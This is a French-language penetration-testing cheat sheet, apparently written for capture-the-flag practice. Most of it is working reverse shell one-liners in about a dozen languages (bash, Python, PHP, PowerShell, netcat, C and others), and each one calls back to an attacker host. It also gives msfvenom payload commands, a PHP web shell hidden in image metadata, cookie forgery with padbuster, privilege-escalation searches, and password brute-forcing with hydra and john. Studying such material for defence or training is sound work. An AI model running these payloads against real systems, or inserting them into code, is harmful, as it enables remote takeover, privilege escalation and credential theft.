Reverse shell samples :

Bash

  bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
  sh -i >& /dev/udp/192.168.1.2/5555 0>&1

PERL

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Linux:

export RHOST="192.168.1.2";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Windows:

C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('192.168.1.2', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, 
__g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
extensions : php, php3, php.jpg, php.png

Ruby

Linux:

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Windows:

ruby -rsocket -e 'c=TCPSocket.new("192.168.1.2","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat

nc -e /bin/sh 10.0.0.1 1234

Si netcat ne dispose pas de l'option -e :

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.2 4444 0/tmp/p

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()''

Telnet

telnet ATTACKING-IP 80 | /bin/bash | telnet 192.168.1.2 4444
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 4444 0/tmp/p

Socat

socat tcp-connect:<IP>:<PORT> exec:"bash -li",pty,stderr,setsid,sigint,sane

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.2",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Awk

awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

NodeJS

require('child_process').exec('nc -e /bin/sh 192.168.1.2 4444')

C

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <unistd.h>
 
/*
 * Reverse-shell sample: connects a TCP socket to a hard-coded address
 * (192.168.1.2, port 4444), makes that socket the process's descriptors
 * 0, 1 and 2, then replaces the process image with /bin/sh.
 *
 * None of the return values (inet_aton, socket, connect, dup2, execve) are
 * checked, so the program keeps going after any failure.
 *
 * Defensive reading: after the execve the process is a /bin/sh whose
 * stdin, stdout and stderr all refer to one outbound TCP socket. That
 * combination (shell process + socket-backed standard descriptors + outbound
 * connection) is what endpoint monitoring and egress filtering can key on.
 */
int main ()
 
{
  /* Destination is fixed at compile time; nothing is read from argv or env. */
  const char* ip = "192.168.1.2";
  struct sockaddr_in addr;
  addr.sin_family = AF_INET;
  addr.sin_port = htons(4444);      /* port converted to network byte order */
  inet_aton(ip, &addr.sin_addr);    /* dotted-quad string -> in_addr; result unchecked */
  int sockfd = socket(AF_INET, SOCK_STREAM, 0);
  connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
  /* Duplicate the socket onto descriptors 0, 1 and 2. */
  for (int i = 0; i < 3; i++)
  {
    dup2(sockfd, i);
  }
  /* Called with no argument vector and no environment (both NULL). */
  execve("/bin/sh", NULL, NULL);
  /* execve does not return on success, so this is reached only if it failed. */
  return 0;
}

msfvenom

Linux:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf

Windows:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > reversetcp.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > reversetcp.exe

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Scripts d’énumération automatique :

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

Commandes d’interaction

who → Affiche les tty connectés

wall “hello world !” → Envoie un message sur tous les tty connectés

Transfert de fichiers

socat TCP4-LISTEN:1234 TCP4:10.10.10.171:80 & → Lance un relais TCP vers une autre machine (pivoting)

python -m SimpleHTTPServer <PORT>→ Lance un serveur web dans le répertoire local

apt-get install python-pyftpdlib, puis python -m pyftpdlib -p 21 → Lance un serveur FTP dans le répertoire courant

login = anonymous

pwd = anonymous@

impacket/examples/smbserver.py -smb2support -username guest -password guest share /root/htb→ Lance un serveur smb accessible en tant que guest/guest

Possibilité d’y accéder sous Windows avec un net use

De la machine cible vers la machine locale

nc –l -p [LocalPort] > [outfile]
nc –w3 [TargetIPaddr] [port] < [infile]

De la machine locale vers la machine cible

nc –l -p [LocalPort] < [infile]
nc –w3 [TargetIPaddr] [port] > [outfile]

Enumération :

nslookup -type=<MX / A / AAAA / TXT / CNAME / PTR> <DOMAIN> [IP_NAMESERVER]

nslookup -type=MX test.fr

nmap --script <SCRIPT> -p <PORT> <IPADDRESS>

nmap -p- $ip → liste les ports ouverts (-p- = -p 1-65535 = tous les ports)

nmap -p 22,80 -sC -sV -oN outfile.txt $ip

nmap -A -T4 -sV $ip

nmap –script smb-vuln* -p 139,445 $ip

Options:

-A : détection du système et des versions

-sP : simple ping scan (ancien nom de -sn)

-sS/sT/sA/sW/sM: Scans TCP SYN/Connect()/ACK/Window/Maimon

-sN/sF/sX: Scans TCP Null, FIN et Xmas

-sU: Scan UDP

-sC: Équivalent à --script=default

-sV: Essaie de déterminer le service et la version

-oN/-oX: outfile.txt/outfile.xml

-T4 : Définit le profil de temporisation (de 0 à 5)

nikto -h <URL> -p <PORTS>
nikto -h <URL>:<PORTS>

nikto -h $ip -p 80,443

gobuster dir --url <IP ADDRESS> --wordlist <WORDLIST> -x <EXTENSION>

gobuster dir –url $ip –wordlist /usr/share/wordlists/dirb/big.txt -x php,txt,html,htm

-k → pas de vérification du certificat SSL

cat *.txt | gobuster dir –url $ip –wordlist - → pour piper plusieurs wordlists dans gobuster

Wordlists:
  1. /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
  2. /usr/share/dirb/wordlists/big.txt
smbclient --list //<IPADDRESS>/ -U "" -> Enumération des répertoires partagés accessibles en anonymous

rpcclient -U “” -N $ip → Accès en RPC de façon anonyme (WINDOWS)

enum4linux -a $ip → Enumération SMB, RPC & co (WINDOWS)

dirb <url> <wordlist>

dirb http://docker.hackthebox.eu:58651 /usr/share/dirb/wordlists/vulns/apache.txt

dirb options :

-a “agent” → spécifie un user-agent

-R → récursivité interactive

-o output.txt → redirige l'output

wfuzz –hh=<PARAM_SIZE> -w <WORDLIST> <URL>.php?<PARAM_NAME>=test

wfuzz –hh=24 -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test

Exploitation & Elévation de privilèges :

python -c 'import pty; pty.spawn(“/bin/sh”)'

/usr/bin/script -qc /bin/bash /dev/null

Pour obtenir un shell interactif avec un TTY (et non des privilèges plus élevés), afin de passer d’un reverse shell brut à un shell complet

padbuster <URL> <COOKIE> <BLOCK_SIZE> -cookies "<PHPESSID_COOKIE> <OPTIONNAL_COOKIES>" --plaintext '<NEW_VALUE>'

padbuster http://docker.hackthebox.eu:59436/profile.php tu%2FOelHH0Nx8BaMhIurtihnbzj6YiABdvdMp0%2Fm6NII%2FClg%2B5Os9Rg%3D%3D 8 -cookies “PHPSESSID=74j9m7o8pbaq8pdoq3l56rvpk4; iknowmag1k=tu%2FOelHH0Nx8BaMhIurtihnbzj6YiABdvdMp0%2Fm6NII%2FClg%2B5Os9Rg%3D%3D” –plaintext ‘{“user”:”test”,”role”:”admin”}’

searchsploit -t <INTITLE>  <KEYWORDS> -w

searchsploit windows local smb

sudo -l → liste les commandes autorisées pour l’utilisateur courant

find / -type d -writable 2> /dev/null→ Liste les répertoires accessibles en écriture

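find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null → Recherche les fichiers portant le bit setgid ou setuid (hors liens symboliques, profondeur max. 6), et non l’ensemble des binaires exécutables par l’utilisateur courant ; sans parenthèses autour du -o, seule la branche setuid atteint le -exec et est affichée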

find / -type f -perm /6000 -ls 2>/dev/null→ Liste les fichiers setuid/setgid sur le système

find / -iname "mon_fichier" -print 2>/dev/null → Trouver un fichier précis sur le système

binwalk socute.jpg→ Vérifier le contenu d’une image (peut contenir des fichiers zip par exemple)

msfvenom -p windows/meterpreter/reverse_tcp lhost=<LOCALIP> lport=<LOCALPORT> -f <FORMAT> > <OUTPUTFILE>

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 -f exe > payload.exe

exiftool -Comment='<?php $sock = fsockopen("<IPADDRESS>",<PORT>);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>'   <IMAGE>

exiftool -Comment='<?php $sock = fsockopen(“10.10.10.1”,1234);$proc = proc_open(“/bin/sh -i”, array(0⇒$sock, 1⇒$sock, 2⇒$sock), $pipes); ?>’ photo.png

Injection SQL :

sqlmap -u <URL> (--dbs / --tables -D <DATABASE> / --columns -D <DATABASE> -T <TABLENAME>)

sqlmap -u http://bidule.fr/index.php?id= –columns -D information_schema -T USER_PRIVILEGES

Les caractères accentués peuvent poser problème lors de l'authentification (creds)

Bruteforce :

Creation Dico

Crée un dico depuis une url

crunch <min length> <max length> <characters to use> -o output.txt

crunch 4 4 1234ABCDEF -o wordlist.txt

crunch 4 15 “abcdefghijklmnopqrstuvwxyz”

-t : set a specific pattern using @ , % ^ — @ represents lowercase letters, "," represents uppercase letters, % represents numbers, ^ represents symbols
cewl <URL>

cewl -d 2 -m 5 -w dict.txt https://example.com → Explore le site à une profondeur de 2 (-d 2), ne retient que les mots d'au moins 5 caractères (-m 5) et les enregistre dans un fichier (-w dict.txt), en ciblant l'URL donnée (https://example.com)

cupp → Génère des dictionnaires pour les attaques à partir de données personnelles

ncrack -U <USERS.TXT> -P <PASSWD.TXT> ssh://$ip
hydra -l <USER> -P <WORDLIST> <IP ADDRESS> <METHOD> <URL>

hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip http-get /monitoring

hydra -l <LOGIN> -P <WORDLIST> <URL> <METHOD>"<PAGE>:<ARGUMENT>=^<VALUE>^:<INCORRECT STRING>" -w <THREADS> -s <PORT>

hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/index.php:password=^PASS^:Invalid password” -w 10 -s 45692

john –incremental <HASHFILE> → Pour bruteforcer de façon incrémentale

john <HASHFILE> –wordlist=/usr/share/wordlists/rockyou.txt→ Pour bruteforcer avec un dictionnaire

Script de bruteforce anti-CSRF :

https://github.com/J3wker/anti-CSRF_Token-Bruteforce

MISC

ROT47

perl -lanE '$_ =~ tr/!-~/P-~!-O/; say $_' dic.txt > dic_rot47.txt


SOURCES: